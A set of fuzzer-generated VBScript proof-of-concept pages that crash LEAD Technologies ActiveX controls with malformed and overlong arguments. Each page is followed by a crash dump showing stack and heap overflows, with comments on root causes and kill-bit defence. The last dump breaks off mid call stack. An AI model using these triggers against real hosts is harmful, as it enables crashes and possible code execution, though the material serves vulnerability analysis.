=====================================
<html>
<!--
  Fuzzer-generated reproduction case for the LEADDlg control (ltdlg11n.ocx).
  It instantiates the control by CLSID and calls GetColorRes with hWnd = -1.
  The crash record after this script shows an ACCESS_VIOLATION on a write
  (MOV [EAX],ECX) inside USER32, returning into LTKRN11n.
  Defender note: the CLSID below is the value to match when auditing hosts for
  this control or when disabling it (for example with an ActiveX kill bit).
-->
Test Exploit Page
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
' The next five assignments are descriptive metadata about the member under
' test (file, prototype, name, ProgID, argument count). Nothing later in this
' script reads them.
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"
prototype  = "Function GetColorRes ( ByVal hWnd As Long ) As Integer"
memberName = "GetColorRes"
progid     = "LEADDlgLib.LEADDlg"
argCount   = 1
 
' The only argument: a window handle typed as Long, set to -1.
arg1=-1
 
' Triggering call. In the recorded crash the faulting routine stores four
' DWORDs through the pointer in its first stack argument (EBP+8 = 7713643C).
' That address appears to lie inside a loaded module image, judging by the
' OLEAUT32 return addresses elsewhere on this page (to be confirmed).
' How the -1 handle leads to that pointer is not visible in the log.
target.GetColorRes arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7E428FB5    MOV [EAX],ECX
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
USER32.7E428FB5               LTKRN11n.2000A033            
 
 
Registers:
--------------------------------------------------
EIP 7E428FB5 -> 8B044689
EAX 7713643C -> 8B044689
EBX 00000000
ECX 00000000
EDX 00000001
EDI 02AB1FE0 -> 00000000
ESI 771363F8 -> F33BF08B
EBP 0013EC60 -> 00000000
ESP 0013EC60 -> 00000000
 
 
Block Disassembly:
--------------------------------------------------
7E428FA8    PUSH EBP
7E428FA9    MOV EBP,ESP
7E428FAB    MOV EAX,[EBP+8]
7E428FAE    TEST EAX,EAX
7E428FB0    JE SHORT 7E428FCC
7E428FB2    MOV ECX,[EBP+C]
7E428FB5    MOV [EAX],ECX     <--- CRASH
7E428FB7    MOV ECX,[EBP+10]
7E428FBA    MOV [EAX+4],ECX
7E428FBD    MOV ECX,[EBP+14]
7E428FC0    MOV [EAX+8],ECX
7E428FC3    MOV ECX,[EBP+18]
7E428FC6    MOV [EAX+C],ECX
7E428FC9    XOR EAX,EAX
7E428FCB    INC EAX
 
 
ArgDump:
--------------------------------------------------
EBP+8   7713643C -> 8B044689
EBP+12  00000000
EBP+16  00000000
EBP+20  00000000
EBP+24  00000000
EBP+28  02AB1FE0 -> 00000000
 
 
Stack Dump:
--------------------------------------------------
13EC60 00 00 00 00 33 A0 00 20 3C 64 13 77 00 00 00 00  [.........d.w....]
13EC70 00 00 00 00 00 00 00 00 00 00 00 00 E0 1F AB 02  [................]
13EC80 D4 EC 13 00 20 1A FF 1F F8 63 13 77 E0 1F AB 02  [.........c.w....]
13EC90 B4 ED 13 00 3A 11 BE 1F D4 EC 13 00 AC ED 13 00  [................]
13ECA0 E0 1F AB 02 58 1F AB 02 F8 1E AB 02 00 00 00 00  [....X...........]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)

=====================================
<html>
<!--
  Fuzzer-generated reproduction case for the LEADDlg control (ltdlg11n.ocx).
  It assigns -1 to the Bitmap property, declared as "Property Let ... As Long".
  The crash record after this script shows an ACCESS_VIOLATION on a read from
  address 0: CMP DWORD PTR [EAX],6461656C with EAX = 00000000.
  Defender note: the CLSID below is the value to match when auditing hosts for
  this control or when disabling it (for example with an ActiveX kill bit).
-->
Test Exploit Page
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
' The next five assignments are descriptive metadata about the member under
' test. Nothing later in this script reads them.
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"
prototype  = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid     = "LEADDlgLib.LEADDlg"
argCount   = 1
 
' Value for the Bitmap property. It shows up as FF FF FF FF at ESP+4 in the
' stack dump, i.e. as the first argument of the faulting routine.
arg1=-1
 
' Triggering assignment. The disassembly shows the result of an indirect call
' (CALL [AB00EC]) being stored through ECX and then dereferenced with no NULL
' test in between. The compared constant 6461656C is the byte sequence "lead"
' in memory order, which looks like a signature check on the object the Long
' is expected to identify (inferred from the constant, not confirmed).
target.Bitmap = arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: AA62D2  CMP DWORD PTR [EAX],6461656C
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
 
 
Registers:
--------------------------------------------------
EIP 00AA62D2
EAX 00000000
EBX 7C80FF22 -> A868146A
ECX 02AB2128 -> 00000000
EDX 00150608 -> 7C97E5A0
EDI 02AB2128 -> 00000000
ESI 02AB1F58 -> 00AB07C0
EBP FFFFFFFF
ESP 0013ED98 -> 00AA6292
 
 
Block Disassembly:
--------------------------------------------------
AA62BE  POP EBX
AA62BF  RETN 8
AA62C2  PUSH DWORD PTR [ESP+4]
AA62C6  CALL [AB00EC]
AA62CC  MOV ECX,[ESP+8]
AA62D0  MOV [ECX],EAX
AA62D2  CMP DWORD PTR [EAX],6461656C      <--- CRASH
AA62D8  JE SHORT 00AA62DF
AA62DA  AND DWORD PTR [ECX],0
AA62DD  JMP SHORT 00AA62E2
AA62DF  MOV EAX,[EAX+8]
AA62E2  RETN 8
AA62E5  PUSH ESI
AA62E6  MOV ESI,[ESP+8]
AA62EA  LEA ECX,[ESI-60]
 
 
Stack Dump:
--------------------------------------------------
13ED98 92 62 AA 00 FF FF FF FF 28 21 AB 02 00 00 00 00  [.b..............]
13EDA8 AC 60 1A 00 CC ED 13 00 C0 07 AB 00 D9 5C 13 77  [.`...........\.w]
13EDB8 58 1F AB 02 FF FF FF FF 00 EE 13 00 B0 A0 B1 02  [X...............]
13EDC8 C0 ED 13 00 5C EE 13 00 E8 62 13 77 58 1F AB 02  [....\....b.wX...]
13EDD8 60 00 00 00 04 00 00 00 0A 00 00 00 01 00 00 00  [`...............]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)


=====================================
<html>
<!--
  Fuzzer-generated reproduction case for the LEADThumb control (lttmb11n.ocx).
  It calls BrowseDir with a 4116-character directory string.
  Two ACCESS_VIOLATION records follow this script. In both, the faulting
  pointer is 41414141, the fill byte of the input string.
  The call stacks contain SCROBJ frames, so the run was made under a script
  host. Whether a browser would permit scripting of this control is not shown
  on this page.
  Defender note: the CLSID below is the value to match when auditing hosts for
  this control or when disabling it (for example with an ActiveX kill bit).
-->
Test Exploit Page
<object classid='clsid:00110200-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
' The next five assignments are descriptive metadata about the member under
' test. Nothing later in this script reads them.
targetFile = "C:\Program Files\Rational\common\lttmb11n.ocx"
prototype  = "Function BrowseDir ( ByVal pszDirectory As String ) As Integer"
memberName = "BrowseDir"
progid     = "LEADThumbLib.LEADThumb"
argCount   = 1
 
' Over-long directory name: 4116 copies of "A" (byte 41).
arg1=String(4116, "A")
 
' Triggering call. In the second crash record the control reloads a pointer
' from its own frame (MOV ECX,[ESP+7B4]) and finds 41414141 there. That is
' consistent with an unchecked copy of pszDirectory into a fixed-size stack
' buffer overwriting adjacent stack data. The compare against 5C ("\") at the
' fault suggests a trailing-backslash test on the path (inferred).
' Root cause: no length check is evident before the copy.
target.BrowseDir arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C80BE74    MOV CL,[EAX]
 
Seh Chain:
--------------------------------------------------
1   7C839AD8    KERNEL32.dll
2   73352960    VBSCRIPT.dll
3   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
KERNEL32.7C80BE74             LTTMB11n.AC1153              
LTTMB11n.AC1153               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             lttmb11n.AA6E11              
lttmb11n.AA6E11               lttmb11n.AA27C9              
lttmb11n.AA27C9               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C80BE74
EAX 41414141
EBX 00000000
ECX 41414141
EDX 41414142
EDI 00AA46E9 -> 8BEC8B55
ESI FFFFFFF6
EBP 0013C560 -> 0013EDAC
ESP 0013C53C -> 00AA46E9
 
 
Block Disassembly:
--------------------------------------------------
7C80BE5D    CALL 7C8024D6
7C80BE62    MOV EAX,[EBP+8]
7C80BE65    TEST EAX,EAX
7C80BE67    JE 7C836665
7C80BE6D    AND DWORD PTR [EBP-4],0
7C80BE71    LEA EDX,[EAX+1]
7C80BE74    MOV CL,[EAX]      <--- CRASH
7C80BE76    INC EAX
7C80BE77    TEST CL,CL
7C80BE79    JNZ SHORT 7C80BE74
7C80BE7B    SUB EAX,EDX
7C80BE7D    OR DWORD PTR [EBP-4],FFFFFFFF
7C80BE81    CALL 7C802511
7C80BE86    RETN 4
7C80BE89    NOP
 
 
ArgDump:
--------------------------------------------------
EBP+8   41414141
EBP+12  0013EDAC -> 0013EDCC
EBP+16  00000008
EBP+20  02231F58 -> 00AAA628
EBP+24  0013CD70 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28  00000000
 
 
Stack Dump:
--------------------------------------------------
13C53C E9 46 AA 00 F6 FF FF FF 00 00 00 00 3C C5 13 00  [.F..............]
13C54C AC F1 13 00 AC F1 13 00 D8 9A 83 7C 90 BE 80 7C  [................]
13C55C 00 00 00 00 AC ED 13 00 53 11 AC 00 41 41 41 41  [........S.......]
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00  [........X...p...]
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00  [................]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: AC115A  CMP BYTE PTR [ECX+EAX-1],5C
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
LTTMB11n.AC115A               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             lttmb11n.AA6E11              
lttmb11n.AA6E11               lttmb11n.AA27C9              
lttmb11n.AA27C9               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 00AC115A
EAX 00000000
EBX 00000000
ECX 41414141
EDX 00000000
EDI 00AA46E9 -> 8BEC8B55
ESI FFFFFFF6
EBP 0013EDAC -> 0013EDCC
ESP 0013C56C -> 0013EDAC
 
 
Block Disassembly:
--------------------------------------------------
AC113E  PUSH EAX
AC113F  CALL [ACE1B0]
AC1145  MOV ECX,[ESP+7B4]
AC114C  PUSH ECX
AC114D  CALL [ACE1AC]
AC1153  MOV ECX,[ESP+7B4]
AC115A  CMP BYTE PTR [ECX+EAX-1],5C   <--- CRASH
AC115F  JE SHORT 00AC1171
AC1161  LEA EAX,[ESP+68]
AC1165  PUSH ACA03C
AC116A  PUSH EAX
AC116B  CALL [ACE1A8]
AC1171  MOV EAX,[ESP+7B8]
AC1178  LEA ECX,[ESP+68]
AC117C  PUSH EAX
 
 
ArgDump:
--------------------------------------------------
EBP+8   02231F58 -> 00AAA628
EBP+12  00184934 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16  0013EE10 -> 00000000
EBP+20  0013EE00 -> 00130000
EBP+24  02281A50 -> 00000038
EBP+28  0013EDC0 -> 0013EE00
 
 
Stack Dump:
--------------------------------------------------
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00  [........X...p...]
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00  [................]
13C58C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13C59C 1C 00 00 00 96 00 00 00 96 00 00 00 00 02 00 00  [................]
13C5AC 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  [................]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)

=====================================
<html>
<!--
  Fuzzer-generated reproduction case for the LEADImgList control
  (ltlst11n.ocx). It calls Insert with Bitmap = 1, pszText = "defaultV" and
  Data = -2147483647.
  Two ACCESS_VIOLATION records follow this script: a read from address
  00000001 inside KERNEL32, then a read from address 0 inside ltlst11n.
  The call stacks contain SCROBJ frames, so the run was made under a script
  host. Whether a browser would permit scripting of this control is not shown
  on this page.
  Defender note: the CLSID below is the value to match when auditing hosts for
  this control or when disabling it (for example with an ActiveX kill bit).
-->
Test Exploit Page
 
<object classid='clsid:00110100-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
' The next five assignments are descriptive metadata about the member under
' test. Nothing later in this script reads them.
targetFile = "C:\Program Files\Rational\common\ltlst11n.ocx"
prototype  = "Function Insert ( ByVal Bitmap As Long ,  ByVal pszText As String ,  ByVal Data As Long ) As Integer"
memberName = "Insert"
progid     = "LEADImgListLib.LEADImgList"
argCount   = 3
 
' Bitmap = 1. The first fault reads from address 00000001, which appears to be
' this value used as an address (EDX = EBP+8 = 00000001 in that record).
arg1=1
' Ordinary short text. It is visible unchanged in the second ArgDump.
arg2="defaultV"
' Data = 80000001 hex. It appears in the second ArgDump (EBP+20) but not in
' either faulting address.
arg3=-2147483647
 
' Triggering call. After the indirect call at AA10FE returns, its result is
' stored through ECX and dereferenced with no NULL test (EAX = 0 at the
' fault). The compared constant 6461656C is the byte sequence "lead" in memory
' order, which looks like a signature check on the bitmap object (inferred).
target.Insert arg1 ,arg2 ,arg3
 
</script>
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C809EDA    MOV AL,[EDX]
 
Seh Chain:
--------------------------------------------------
1   7C839AD8    KERNEL32.dll
2   7C839AD8    KERNEL32.dll
3   73352960    VBSCRIPT.dll
4   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
KERNEL32.7C809EDA             KERNEL32.7C834E80            
KERNEL32.7C834E80             ltlst11n.AA1104              
ltlst11n.AA1104               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltlst11n.AAAAB2              
ltlst11n.AAAAB2               ltlst11n.AA45C5              
ltlst11n.AA45C5               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C809EDA
EAX 00000001
EBX 00000001
ECX 02650B60 -> 00AB7948
EDX 00000001
EDI 00000001
ESI 00001000
EBP 0013ED20 -> 0013ED60
ESP 0013ECF4 -> 00000000
 
 
Block Disassembly:
--------------------------------------------------
7C809EC2    TEST EDX,EDX
7C809EC4    JE 7C80BFD0
7C809ECA    LEA EDI,[EDX+EAX-1]
7C809ECE    CMP EDI,EDX
7C809ED0    JB 7C80BFD0
7C809ED6    AND DWORD PTR [EBP-4],0
7C809EDA    MOV AL,[EDX]      <--- CRASH
7C809EDC    LEA EAX,[ESI-1]
7C809EDF    NOT EAX
7C809EE1    MOV ECX,EAX
7C809EE3    AND ECX,EDX
7C809EE5    MOV [EBP-1C],ECX
7C809EE8    AND EAX,EDI
7C809EEA    MOV [EBP-20],EAX
7C809EED    CMP ECX,EAX
 
 
ArgDump:
--------------------------------------------------
EBP+8   00000001
EBP+12  00000001
EBP+16  00000000
EBP+20  02650BC0 -> 00AB77F0
EBP+24  00000000
EBP+28  0013EDB4 -> 00181884
 
 
Stack Dump:
--------------------------------------------------
13ECF4 00 00 00 00 C0 0B 65 02 01 00 00 00 02 00 00 00  [......e.........]
13ED04 03 00 00 00 F4 EC 13 00 D0 97 53 00 50 ED 13 00  [..........S.P...]
13ED14 D8 9A 83 7C 08 9F 80 7C 00 00 00 00 60 ED 13 00  [............`...]
13ED24 80 4E 83 7C 01 00 00 00 01 00 00 00 00 00 00 00  [.N..............]
13ED34 C0 0B 65 02 00 00 00 00 B4 ED 13 00 A0 ED 13 00  [..e.............]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: AA110A  CMP DWORD PTR [EAX],6461656C
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ltlst11n.AA110A               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltlst11n.AAAAB2              
ltlst11n.AAAAB2               ltlst11n.AA45C5              
ltlst11n.AA45C5               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 00AA110A
EAX 00000000
EBX 00000000
ECX 0013EDA0 -> 00000000
EDX 00000000
EDI 00000000
ESI 02650BC0 -> 00AB77F0
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED6C -> 00AA8B02
 
 
Block Disassembly:
--------------------------------------------------
AA10F6  LEAVE
AA10F7  RETN 8
AA10FA  PUSH DWORD PTR [ESP+4]
AA10FE  CALL [AB7164]
AA1104  MOV ECX,[ESP+8]
AA1108  MOV [ECX],EAX
AA110A  CMP DWORD PTR [EAX],6461656C      <--- CRASH
AA1110  JE SHORT 00AA1117
AA1112  AND DWORD PTR [ECX],0
AA1115  JMP SHORT 00AA111A
AA1117  MOV EAX,[EAX+8]
AA111A  RETN 8
AA111D  PUSH EBP
AA111E  MOV EBP,ESP
AA1120  SUB ESP,20
 
 
ArgDump:
--------------------------------------------------
EBP+8   02650BC0 -> 00AB77F0
EBP+12  00000001
EBP+16  00181884 -> Uni: defaultV
EBP+20  80000001
EBP+24  0013EE10 -> 00000000
EBP+28  0013EE00 -> 00130000
 
 
Stack Dump:
--------------------------------------------------
13ED6C 02 8B AA 00 01 00 00 00 A0 ED 13 00 00 00 00 00  [................]
13ED7C B4 32 18 00 F0 77 AB 00 04 00 00 00 03 00 00 00  [.....w..........]
13ED8C 30 F0 13 00 7C 52 A5 02 00 00 00 00 FF FF FF FF  [.....R..........]
13ED9C 00 00 00 00 00 00 00 00 CC ED 13 00 D9 5C 13 77  [.............\.w]
13EDAC C0 0B 65 02 01 00 00 00 84 18 18 00 01 00 00 80  [..e.............]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)


=====================================
<html>
<!--
  Fuzzer-generated reproduction case for the LEADISIS control (ltisi11n.ocx).
  It assigns a 65535-character string to the DriverName property.
  The records after this script show a faulting byte-copy loop in KERNEL32
  called from ltisi11n, further faults inside ntdll heap routines on 41414141
  values, and a debug-heap message that a block was modified past its
  requested size of 1ec bytes. Together these indicate a heap buffer overrun.
  The debug output names wscript.exe as the host process. Whether a browser
  would permit scripting of this control is not shown on this page.
  Defender note: the CLSID below is the value to match when auditing hosts for
  this control or when disabling it (for example with an ActiveX kill bit).
-->
Test Exploit Page
<object classid='clsid:00110050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
 
' The next five assignments are descriptive metadata about the member under
' test. Nothing later in this script reads them.
targetFile = "C:\Program Files\Rational\common\ltisi11n.ocx"
prototype  = "Property Let DriverName As String"
memberName = "DriverName"
progid     = "LEADISISLib.LEADISIS"
argCount   = 1
 
' Over-long driver name: 65535 copies of "A" (byte 41).
arg1=String(65535, "A")
 
' Triggering assignment. The first record shows a copy that runs until a NUL
' byte (MOV AL,[ECX] / MOV [EDX],AL / JNZ) with its destination on the heap
' (EBP+8 = 02A71FD8). It faults when the destination reaches 02A73000.
' Root cause: no length check on DriverName is evident before the copy.
target.DriverName = arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C80BEB9    MOV [EDX],AL
 
Seh Chain:
--------------------------------------------------
1   7C839AD8    KERNEL32.dll
2   73352960    VBSCRIPT.dll
3   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
KERNEL32.7C80BEB9             ltisi11n.AA1537              
ltisi11n.AA1537               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltisi11n.AA64D7              
ltisi11n.AA64D7               ltisi11n.AA319B              
ltisi11n.AA319B               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.73311302            
VBSCRIPT.73311302             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C80BEB9 -> AD0013ED
EAX 0013BD41 -> AD0013ED
EBX 00AAA760 -> 00AA408F
ECX 0013CDA4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 02A73000
EDI 0000302A
ESI 02A71F58 -> 00AAA760
EBP 0013BD6C -> 0013EDB0
ESP 0013BD48 -> 0000302A -> Uni: *0*0
 
 
Block Disassembly:
--------------------------------------------------
7C80BEA3    PUSH 7C80BED0
7C80BEA8    CALL 7C8024D6
7C80BEAD    AND DWORD PTR [EBP-4],0
7C80BEB1    MOV ECX,[EBP+C]
7C80BEB4    MOV EDX,[EBP+8]
7C80BEB7    MOV AL,[ECX]
7C80BEB9    MOV [EDX],AL      <--- CRASH
7C80BEBB    INC ECX
7C80BEBC    INC EDX
7C80BEBD    TEST AL,AL
7C80BEBF    JNZ SHORT 7C80BEB7
7C80BEC1    OR DWORD PTR [EBP-4],FFFFFFFF
7C80BEC5    MOV EAX,[EBP+8]
7C80BEC8    CALL 7C802511
7C80BECD    RETN 8
 
 
ArgDump:
--------------------------------------------------
EBP+8   02A71FD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12  0013BD7C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16  41414141
EBP+20  41414141
EBP+24  41414141
EBP+28  41414141
 
 
Stack Dump:
--------------------------------------------------
13BD48 2A 30 00 00 58 1F A7 02 60 A7 AA 00 48 BD 13 00  [....X...`...H...]
13BD58 7C BD 13 00 AC F1 13 00 D8 9A 83 7C D0 BE 80 7C  [................]
13BD68 00 00 00 00 B0 ED 13 00 37 15 AA 00 D8 1F A7 02  [................]
13BD78 7C BD 13 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13BD88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C919084    MOV ECX,[EBX]
 
Seh Chain:
--------------------------------------------------
1   7C90E920    ntdll.dll
2   7C90E920    ntdll.dll
3   7C90E920    ntdll.dll
4   7C90E920    ntdll.dll
5   73352960    VBSCRIPT.dll
6   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ntdll.7C919084                ntdll.7C96EEA0               
ntdll.7C96EEA0                ntdll.7C94B394               
ntdll.7C94B394                ntdll.7C918F21               
ntdll.7C918F21                ltisi11n.AA69BC              
ltisi11n.AA69BC               ltisi11n.AA7189              
ltisi11n.AA7189               ltisi11n.AA154C              
ltisi11n.AA154C               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltisi11n.AA64D7              
ltisi11n.AA64D7               ltisi11n.AA319B              
ltisi11n.AA319B               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.73311302            
VBSCRIPT.73311302             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
